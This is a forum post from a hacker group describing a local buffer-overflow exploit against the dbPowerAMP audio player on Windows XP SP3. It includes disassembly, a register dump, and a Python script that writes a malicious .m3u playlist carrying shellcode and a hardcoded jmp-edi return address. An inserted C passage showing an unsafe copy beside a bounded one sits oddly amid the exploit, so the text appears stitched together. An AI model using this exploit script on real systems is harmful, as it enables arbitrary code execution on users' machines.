dbpoweramp local exploit, a different scenario

    # Exploit Title: dbpoweramp local buffer overflow, a different approach
    # Date: 31/8/2010
    # Author: 41.w4r10r and FB1H2S
    # Software Link: http://usfiles.brothersoft.com/mp3_a...owerAMP-r2.exe
    # Version: [app version]
    # Tested on: Microsoft XP service pack 3
    # CVE : http://cve.mitre.org/cgi-bin/cvename...=CVE-2008-0661

    The local exploits published at http://www.exploit-db.com/exploits/5069 and http://www.exploit-db.com/exploits/5067 show that the software has an overflow
    which can be exploited with a 255-char string: that length overwrites EIP. If the string goes above 255 chars, EIP is not
    overwritten; EDI is overwritten instead. The published exploit uses a direct EIP overwrite with a 255-char string (shellcode + junk).
    But it is also possible to exploit the application with a 255+ char string in the following way.

    1) 270 chars overwrite EDI while EIP remains intact
    2) EDI (the destination index) now points into our junk, so we have control over EDI
    3) EDI points to data, so overwrite it to point to EDX, which also holds our junk; a jump EDX will work
    4) Now EIP will be overwritten, so in the second step make EIP point to EDI and we can run our arbitrary code.
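    The copy routine the write-up disassembles (length via REPNE SCAS, unbounded REP MOVS into a fixed-size buffer, then strrchr for '\') is the classic unchecked string copy. The C below is an added illustration, not code from the original post or from the application: it shows that pattern next to a bounded version that rejects any playlist entry that does not fit. The 256-byte buffer size, the function names and the sample entries are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Destination size: the write-up shows 255 chars still fit and longer
   entries clobber saved registers, so 256 incl. NUL (an assumption). */
#define PATH_BUF 256

/* The disassembly's pattern: length via REPNE SCAS, unbounded copy via
   REP MOVS, then strrchr for '\\'. Nothing checks that src fits in dst. */
const char *basename_unsafe(char *dst, const char *src)
{
    size_t n = strlen(src) + 1;   /* OR ECX,-1 ; REPNE SCASB ; NOT ECX */
    memcpy(dst, src, n);          /* REP MOVSD / REP MOVSB, no bound */
    const char *p = strrchr(dst, '\\');
    return p ? p + 1 : dst;
}

/* Hardened form: measure, refuse anything that cannot fit with its NUL,
   then copy. Returns 0 on success, -1 (and *out = NULL) on rejection. */
int basename_safe(char dst[PATH_BUF], const char *src, const char **out)
{
    size_t n = strlen(src);
    if (n >= PATH_BUF) {
        *out = NULL;
        return -1;
    }
    memcpy(dst, src, n + 1);
    const char *p = strrchr(dst, '\\');
    *out = p ? p + 1 : dst;
    return 0;
}

/* Constructed inputs: one ordinary entry and a 270-byte entry like the one
   the .m3u file carries. Returns how many entries the hardened routine
   rejected (1), or -1 if the ordinary entry was mishandled. */
int count_rejected_entries(void)
{
    char buf[PATH_BUF], longentry[271];
    const char *out;
    int rejected = 0;
    memset(longentry, 'A', 270);
    longentry[270] = '\0';
    if (basename_safe(buf, "C:\\music\\song.mp3", &out) != 0) return -1;
    if (strcmp(out, "song.mp3") != 0) return -1;
    if (basename_safe(buf, longentry, &out) != 0) rejected++;
    return rejected;
}
```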

    ####################################################################################################
    # With a 255+ char string, the assembled code gives an idea of what is happening
    ####################################################################################################
    Code:
    00422BD0  /$ 56             PUSH ESI
    00422BD1  |. 57             PUSH EDI
    00422BD2  |. 8B7C24 0C      MOV EDI,DWORD PTR SS:[ESP+C]
    00422BD6  |. 83C9 FF        OR ECX,FFFFFFFF
    00422BD9  |. 33C0           XOR EAX,EAX
    00422BDB  |. 6A 5C          PUSH 5C                                  ; /c = 5C  ('\')
    00422BDD  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]             ; | Repeat and 
    00422BDF  |. 8B4424 14      MOV EAX,DWORD PTR SS:[ESP+14]            ; |
    00422BE3  |. F7D1           NOT ECX                                  ; |
    00422BE5  |. 2BF9           SUB EDI,ECX                              ; |
    00422BE7  |. 50             PUSH EAX                                 ; |s
    00422BE8  |. 8BD1           MOV EDX,ECX                              ; |
    00422BEA  |. 8BF7           MOV ESI,EDI                              ; |
    00422BEC  |. 8BF8           MOV EDI,EAX                              ; |
    00422BEE  |. C1E9 02        SHR ECX,2                                ; |
    00422BF1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>; |
    00422BF3  |. 8BCA           MOV ECX,EDX                              ; |
    00422BF5  |. 83E1 03        AND ECX,3                                ; |
    00422BF8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
    00422BFA  |. FF15 E4A14200  CALL DWORD PTR DS:[<&MSVCRT.strrchr>]    ; \strrchr
    00422C00  |. 83C4 08        ADD ESP,8
    
    #The registers at the time of the overflow
    
    EAX 00000000
    ECX FFFFFFFF
    EDX 00B9ECD8 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
    EBX 00B9F110 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
    ESP 00B9ECB4
    EBP 77C3F931 msvcrt.sprintf
    ESI 00B9F285
    EDI 41414141
    EIP 00422BDD Amp.00422BDD
    C 0  ES 0023 32bit 0(FFFFFFFF)
    P 1  CS 001B 32bit 0(FFFFFFFF)
    A 0  SS 0023 32bit 0(FFFFFFFF)
    Z 1  DS 0023 32bit 0(FFFFFFFF)
    S 0  FS 003B 32bit 7FFDC000(FFF)
    T 0  GS 0000 NULL
    D 0
    O 0  LastErr ERROR_SUCCESS (00000000)
    EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
    ####################################################################################################
    Code:
    ##########
    #!/usr/bin/python
    #
    #And all greets to Garage Hackers Members.
    #http://www.garage4hackers.com
    #And shouts to ICW, Andhra Hackers members
    #
    #and our Brothers:-
    #B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Yash,Secure_IT, Atul, Vinnu and all others. 
    #
    #
    #
    #
    shellcode= ("\x90\x90\xcc\x90\x90\x90\x90\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
    "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
    "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
    "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 
    "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 
    "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 
    "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
    "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 
    "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
    "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
    "\x7f\xe8\x7b\xca\x90\x90\x90\x90\x90\x90")
    leng=260-len(shellcode)               # pad the shellcode out to 260 bytes
    junk = shellcode+"D"*leng
    print len(junk)
    junk=junk+"\xF0\xB0\x80\x7C"+"DCBA\xD8\xEC\xB9\x00"
    #######################################################################################################################
    # Make EDI point to EDX using a jump EDX: DCBA\xD8\xEC\xB9\x00 comes from the application
    # Now we will get control over EIP; point EIP at EDI [ jmp edi = \xF0\xB0\x80\x7C from kernel32.dll, Microsoft XP Service Pack 3 ]
    #######################################################################################################################
    filename = "garage4hackers.m3u"
    f = open(filename,"w")                # write the crafted playlist entry
    f.writelines(junk)
    f.close()
    print "File Is created"
    print "Press Any Key To Continue........."
    raw_input()
    This article was originally published in forum thread: dbpoweramp local exploit, a different scenario, started by fb1h2s.